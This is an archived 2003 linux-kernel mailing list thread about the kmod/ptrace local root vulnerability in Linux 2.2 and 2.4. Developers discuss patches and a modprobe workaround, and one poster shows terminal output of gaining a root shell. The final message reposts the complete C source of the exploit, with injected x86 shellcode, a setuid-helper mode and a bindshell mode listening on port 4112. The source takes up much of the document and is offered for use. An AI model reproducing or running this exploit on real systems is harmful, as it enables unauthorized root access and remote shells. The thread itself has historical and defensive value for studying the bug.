Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Andrus]

You can download working exploit on
http://www.members.ee/ptrace-exploit.c

Its hell long exploit as I know, and still not patched!

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Robinson Maureira Castillo]

On Wed, 19 Mar 2003, Andrus wrote:
> You can download working exploit on
> http://www.members.ee/ptrace-exploit.c
> 
> Its hell long exploit as I know, and still not patched!
> 

I have it, it's no longer on that URL, but I test it against the last 
errata kernel from RedHat and it's not vulnerable.

[rmaureira@linux rmaureira]$ ./ptrace-xploit 
[-] Unable to attach: Operation not permitted
Killed

Best regards

-- 
Robinson Maureira Castillo
INACAP

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Arjan van de Ven]

[-- Attachment #1: Type: text/plain, Size: 875 bytes --]

On Wed, 2003-03-19 at 15:13, Robinson Maureira Castillo wrote:
> On Wed, 19 Mar 2003, Andrus wrote:
> > You can download working exploit on
> > http://www.members.ee/ptrace-exploit.c
> > 
> > Its hell long exploit as I know, and still not patched!
> > 
> 
> I have it, it's no longer on that URL, but I test it against the last 
> errata kernel from RedHat and it's not vulnerable.
> 
> [rmaureira@linux rmaureira]$ ./ptrace-xploit 
> [-] Unable to attach: Operation not permitted
> Killed

there is some misunderstanding about at least one of the exploits out
there; one of them will, when successful, make itself setuid-root....

result:

admin tries exploit, succeeds
admin updates kernel to fixed one
admin tries exploit, gets root again due to setuid-root and thinks the
kernel is not fixed
admin yells at $vendor for providing a broken fix



[-- Attachment #2: This is a digitally signed message part --]
[-- Type: application/pgp-signature, Size: 189 bytes --]

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[BODA Karoly jr.]

On 19 Mar 2003, Alan Cox wrote:
> > Its hell long exploit as I know, and still not patched!
> The ptrace problems I'm aware of are fixed in 2.2.25 or by the patch
> to 2.4.21pre5-ac I posted (I meant to post the 2.4.20 one, someone
> has since done that).

	Well for me it didn't work on those kernels (all was i386 "of
course"): 
2.4.19-pre6aa1
2.4.21-pre4aa1
2.4.21-pre4aa3
2.2.16pre7

	Did work on lot's of others (unpatched 2.4.x, 2.2.x, 2.4.x-acx,
2.4.x-ckx).

-- 
						Woockie
..."what is there in this world that makes living worthwhile?"
Death thought about it. "CATS," he said eventually, "CATS ARE NICE."
			           (Terry Pratchett, Sourcery)

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Anders Gustafsson]

On Wed, Mar 19, 2003 at 03:27:05PM +0000, Alan Cox wrote:
> On Wed, 2003-03-19 at 13:54, Andrus wrote:
> > You can download working exploit on
> > http://www.members.ee/ptrace-exploit.c
> > 
> > Its hell long exploit as I know, and still not patched!
> 
> The ptrace problems I'm aware of are fixed in 2.2.25 or by the patch
> to 2.4.21pre5-ac I posted (I meant to post the 2.4.20 one, someone
> has since done that).

If access can't be shut down while compiling the new kernel 

echo /foo/bar/doesnotexist >/proc/sys/kernel/modprobe

would help, wouldn't it?

-- 
Anders Gustafsson - andersg@0x63.nu - http://0x63.nu/

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Alan Cox]

On Wed, 2003-03-19 at 13:54, Andrus wrote:
> You can download working exploit on
> http://www.members.ee/ptrace-exploit.c
> 
> Its hell long exploit as I know, and still not patched!

The ptrace problems I'm aware of are fixed in 2.2.25 or by the patch
to 2.4.21pre5-ac I posted (I meant to post the 2.4.20 one, someone
has since done that).

Vendor updates seem to be available for most distro/architectures
although S/390 seems to be lagging in a few cases

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Anders Gustafsson]

On Wed, Mar 19, 2003 at 04:13:05PM +0000, Alan Cox wrote:
> On Wed, 2003-03-19 at 14:55, Anders Gustafsson wrote:
> > If access can't be shut down while compiling the new kernel 
> > 
> > echo /foo/bar/doesnotexist >/proc/sys/kernel/modprobe
> > 
> > would help, wouldn't it?
> 
> Against the default exploit circulating yes, in the general
> case we don't believe so.

Ah, there might be other stuff than modprobe that execs out of a
kernelthread. But to exploit the kernelthread must execve so there is a
userspaceprocess to ptrace, right?

-- 
Anders Gustafsson - andersg@0x63.nu - http://0x63.nu/

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[BODA Karoly jr.]

On Wed, 19 Mar 2003, BODA Karoly jr. wrote:

> 	Well for me it didn't work on those kernels (all was i386 "of
> course"): 
> 2.4.19-pre6aa1
> 2.4.21-pre4aa1
> 2.4.21-pre4aa3
> 2.2.16pre7

	I must fix this. On those kernels WORKS the exploit. :( I've tried
lots of times (>100) to run simply the exploit didn't work. But when I
wanted to trace what the difference is it was working. :( I didn't try 
the other versions I think it will work too... strace of course is not
setuid root. Here it goes:

woockie@death:~/tmp$ ls -l ptrace
-rwxr-xr-x    1 woockie  woockie      9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ strace -o /dev/null -f -F ./ptrace
Process 4003 attached
[+] Attached to 4004
[+] Signal caught
[+] Shellcode placed at 0x4000da2d
umovestr: Input/output error
[+] Now wait for suid shell...
Process 4005 attached
Process 4002 suspended
Process 4003 detached
PTRACE_ATTACH: Operation not permitted
Too late?
PTRACE_ATTACH: Operation not permitted
Too late?



[1]+  Stopped                 strace -o /dev/null -f -F ./ptrace
woockie@death:~/tmp$ killall strace
woockie@death:~/tmp$ ls -l ptrace
-rwsr-sr-x    1 root     root         9031 Mar 19 14:59 ptrace
woockie@death:~/tmp$ ./ptrace
root@death:~/tmp#


-- 
						Woockie
..."what is there in this world that makes living worthwhile?"
Death thought about it. "CATS," he said eventually, "CATS ARE NICE."
			           (Terry Pratchett, Sourcery)

P.S.: sorry for the previous mail :( Can anyone explain me why this works
only this way?

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Alan Cox]

On Wed, 2003-03-19 at 14:55, Anders Gustafsson wrote:
> If access can't be shut down while compiling the new kernel 
> 
> echo /foo/bar/doesnotexist >/proc/sys/kernel/modprobe
> 
> would help, wouldn't it?

Against the default exploit circulating yes, in the general
case we don't believe so. Realistically we are a day or two
before a major war breaks out with huge amounts of bad
feeling involved. It is not the time to put off security
updates, especially if you have a potentially US or UK domain
name/address range

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[Rick Warner]

On Wednesday 19 March 2003 08:54 am, Andrus wrote:
> You can download working exploit on
> http://www.members.ee/ptrace-exploit.c
>
> Its hell long exploit as I know, and still not patched!
>
>
> -
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
> Please read the FAQ at  http://www.tux.org/lkml/
This exploit is no longer available at that URL.  Can it please be either 
reposted here or mailed directly to me?
-- 
Rick Warner
Systems Integrator
"In a world without fences and doors, who needs Gates and Windows?"

Re: Kernels 2.2 and 2.4 exploit (ALL VERSION WHAT I HAVE TESTED UNTILL NOW!)

[mix]

[-- Attachment #1: Type: text/plain, Size: 210 bytes --]

On Wed, Mar 19, 2003 at 10:18:07PM -0500, Rick Warner wrote:
> This exploit is no longer available at that URL.  Can it please be either 
> reposted here or mailed directly to me?

Here's the one from bugtraq:

[-- Attachment #2: km3.c --]
[-- Type: text/plain, Size: 7350 bytes --]

/* lame, oversophisticated local root exploit for kmod/ptrace bug in linux
 * 2.2 and 2.4
 * 
 * have fun
 */

#define ANY_SUID	"/usr/bin/passwd"

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <linux/user.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <asm/ioctls.h>
#include <getopt.h>

// user settings:

int randpids=0;

#define M_SIMPLE		0
#define M_DOUBLE		1
#define M_BIND			2

int mode=M_SIMPLE;
char * bin=NULL;

struct stat me;
int chldpid;
int hackpid;

// flags
int sf=0;
int u2=0;

void killed(int a) { u2=1; }
void synch(int x){ sf=1; }

// shellcode to inject
unsigned char shcode[1024];

char ptrace_code[]="\x31\xc0\xb0\x1a\x31\xdb\xb3\x10\x89\xf9"
        "\xcd\x80\x85\xc0\x75\x41\xb0\x72\x89\xfb\x31\xc9\x31\xd2\x31\xf6"
        "\xcd\x80\x31\xc0\xb0\x1a\x31\xdb\xb3\x03\x89\xf9\xb2\x30\x89\xe6"
        "\xcd\x80\x8b\x14\x24\xeb\x36\x5d\x31\xc0\xb0\xFF\x89\xc7\x83\xc5"
        "\xfc\x8b\x75\x04\x31\xc0\xb0\x1a\xb3\x04\xcd\x80\x4f\x83\xed\xfc"
        "\x83\xea\xfc\x85\xff\x75\xea\x31\xc0\xb0\x1a\x31\xdb\xb3\x11\x31"
        "\xd2\x31\xf6\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xc5\xff"
        "\xff\xff";

char execve_tty_code[]=
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68"
        "\x2f\x74\x74\x79\x68\x2f\x64\x65\x76\x89\xe3\xb0\x05\x31\xc9\x66"
        "\xb9\x41\x04\x31\xd2\x66\xba\xa4\x01\xcd\x80\x89\xc3\x31\xc0\xb0"
        "\x3f\x31\xc9\xb1\x01\xcd\x80\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54"
        "\x24\x04\x5b\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8"
        "\xe8\xff\xff\xff";

char execve_code[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\xb0\x46"
        "\x31\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80"
        "\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";

char bind_code[]=
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x40"
        "\x50\x40\x50\x8d\x58\xff\x89\xe1\xb0\x66\xcd\x80\x83\xec\xf4\x89"
        "\xc7\x31\xc0\xb0\x04\x50\x89\xe0\x83\xc0\xf4\x50\x31\xc0\xb0\x02"
        "\x50\x48\x50\x57\x31\xdb\xb3\x0e\x89\xe1\xb0\x66\xcd\x80\x83\xec"
        "\xec\x31\xc0\x50\x66\xb8\x10\x10\xc1\xe0\x10\xb0\x02\x50\x89\xe6"
        "\x31\xc0\xb0\x10\x50\x56\x57\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x83"
        "\xec\xec\x85\xc0\x75\x59\xb0\x01\x50\x57\x89\xe1\xb0\x66\xb3\x04"
        "\xcd\x80\x83\xec\xf8\x31\xc0\x50\x50\x57\x89\xe1\xb0\x66\xb3\x05"
        "\xcd\x80\x89\xc3\x83\xec\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x74"
        "\x08\x31\xc0\xb0\x06\xcd\x80\xeb\xdc\x31\xc0\xb0\x3f\x31\xc9\xcd"
        "\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31\xc0\xb0\x3f\x41\xcd\x80\x31"
        "\xc0\x50\xeb\x13\x89\xe1\x8d\x54\x24\x04\x5b\xb0\x0b\xcd\x80\x31"
        "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe8\xff\xff\xff";

// generate shellcode that sets %edi to pid 
int pidcode(unsigned char * tgt, unsigned short pid)
{
fprintf(stderr, "pid=%d=0x%08x\n", pid, pid);
tgt[0]=0x31; tgt[1]=0xff;
tgt+=2;
	if((pid & 0xff) && (pid & 0xff00)){
	tgt[0]=0x66; tgt[1]=0xbf;
	*((unsigned short*)(tgt+2))=pid;
	return 6;
	}else{
	int n=2;

		if(pid & 0xff00){
		tgt[0]=0xB0; tgt[1]=(pid>>8);
		tgt+=2; n+=2;
		}
		
	memcpy(tgt,"\xC1\xE0\x08", 3); tgt+=3; n+=3;
	
		if(pid & 0xff){
		tgt[0]=0xB0; tgt[1]=pid;
		tgt+=2; n+=2;
		}
	tgt[0]=0x89; tgt[1]=0xC7;
	return n+2;
	}
}

void mkcode(unsigned short pid)
{
int i=0;
unsigned char *c=shcode;
c+=pidcode(c, pid);
strcpy(c, ptrace_code);
c[53]=(sizeof(execve_code)+strlen(bin)+4)/4;
strcat(c, execve_code);
strcat(c, bin);
}

//------------------------

void hack(int pid)
{
int i;
struct user_regs_struct r;
char b1[100]; struct stat st;
int len=strlen(shcode);

	if(kill(pid, 0)) return;

sprintf(b1, "/proc/%d/exe", pid);
	if(stat(b1, &st)) return;

	if(st.st_ino!=me.st_ino || st.st_dev!=me.st_dev) return;
	
	if(ptrace(PTRACE_ATTACH, pid, 0, 0)) return;
	while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
fprintf(stderr, "\033[1;33m+ %d\033[0m\n", pid);
	
	if(ptrace(PTRACE_SYSCALL, pid, 0, 0)) goto fail;
	while(ptrace(PTRACE_GETREGS, pid, NULL, &r));
		
	for (i=0; i<=len; i+=4)
	if(ptrace(PTRACE_POKETEXT, pid, r.eip+i, *(int*)(shcode+i))) goto fail;

kill(chldpid, 9);
ptrace(PTRACE_DETACH, pid, 0, 0);
fprintf(stderr, "\033[1;32m- %d ok!\033[0m\n", pid);

	if(mode==M_DOUBLE){
	char commands[1024];
	char * c=commands;
	kill(hackpid, SIGCONT);
	sprintf(commands, "\nexport TERM='%s'\nreset\nid\n", getenv("TERM"));
		while(*c) { ioctl(0, TIOCSTI, c++); }
	
	waitpid(hackpid, 0, 0);
	}

exit(0);

fail:
ptrace(PTRACE_DETACH, pid, 0, 0);
kill(pid, SIGCONT);
}

void usage(char * cmd)
{
fprintf(stderr, "Usage: %s [-d] [-b] [-r] [-s] [-c executable]\n"
"\t-d\t-- use double-ptrace method (to run interactive programs)\n"
"\t-b\t-- start bindshell on port 4112\n"
"\t-r\t-- support randomized pids\n"
"\t-c\t-- choose executable to start\n"
"\t-s\t-- single-shot mode - abort if unsuccessful at the first try\n", cmd);
exit(0);
}

int main(int ac, char ** av, char ** env)
{
int single=0;
char c;
int mypid=getpid();
fprintf(stderr, "Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>\n\n");
	if(stat("/proc/self/exe", &me) && stat(av[0], &me)){
	perror("stat(myself)");
	return 0;
	}

	while((c=getopt(ac, av, "sbdrc:"))!=EOF) switch(c) {
	case 'd': mode=M_DOUBLE; break;
	case 'b': mode=M_BIND; break;
	case 'r': randpids=1; break;
	case 'c': bin=optarg; break;
	case 's': single=1; break;
	default: usage(av[0]);
	}

	if(ac!=optind) usage(av[0]);

	if(!bin){
		if(mode!=M_SIMPLE) bin="/bin/sh";
		else{
		struct stat qpa;
			if(stat((bin="/bin/id"), &qpa)) bin="/usr/bin/id";
		}
	}

signal(SIGUSR1, synch);

hackpid=0;
	switch(mode){
	case M_SIMPLE:
	fprintf(stderr, "=> Simple mode, executing %s > /dev/tty\n", bin);
	strcpy(shcode, execve_tty_code);
	strcat(shcode, bin);
	break;

	case M_DOUBLE:
	fprintf(stderr, "=> Double-ptrace mode, executing %s, suid-helper %s\n",
			bin, ANY_SUID);
		if((hackpid=fork())==0){
		char *ble[]={ANY_SUID, NULL};
		fprintf(stderr, "Starting suid program %s\n", ANY_SUID);
		kill(getppid(), SIGUSR1);
		execve(ble[0], ble, env);
		kill(getppid(), 9);
		perror("execve(SUID)");
		_exit(0);
		}

		while(!sf);

	usleep(100000);
	kill(hackpid, SIGSTOP);
	mkcode(hackpid);
	break;

	case M_BIND:
	fprintf(stderr, "=> portbind mode, executing %s on port 4112\n", bin);

	strcpy(shcode, bind_code);
	strcat(shcode, bin);
	break;	
	}
fprintf(stderr, "sizeof(shellcode)=%d\n", strlen(shcode));
	
signal(SIGUSR2, killed);

	if(randpids){
	fprintf(stderr, "\033[1;31m"
"Randomized pids support enabled... be patient or load the system heavily,\n"
"this method does more brute-forcing\033[0m\n");
	}

again:
sf=0;
	if((chldpid=fork())==0){
	int q;
	kill(getppid(), SIGUSR1);
		while(!sf);

	fprintf(stderr, "=> Child process started");
		for(q=0;q<10;++q){
		fprintf(stderr, ".");
		socket(22,0,0);
		}
	fprintf(stderr, "\n");
	kill(getppid(), SIGUSR2);
	_exit(0);
	}

	while(!sf);
kill(chldpid, SIGUSR1);

	for(;;){
	int q;
		if(randpids){
			for(q=1;q<30000;++q)
			if(q!=chldpid && q!=mypid && q!=hackpid) hack(q);
		}else{
			for(q=chldpid+1;q<chldpid+10;q++) hack(q);
		}

		if(u2){
		u2=0;
			if(single) break;
		goto again;
		}
	}
fprintf(stderr, "Failed\n");
return 1;
}

// M$ sucks
// 
// http://bezkitu.com/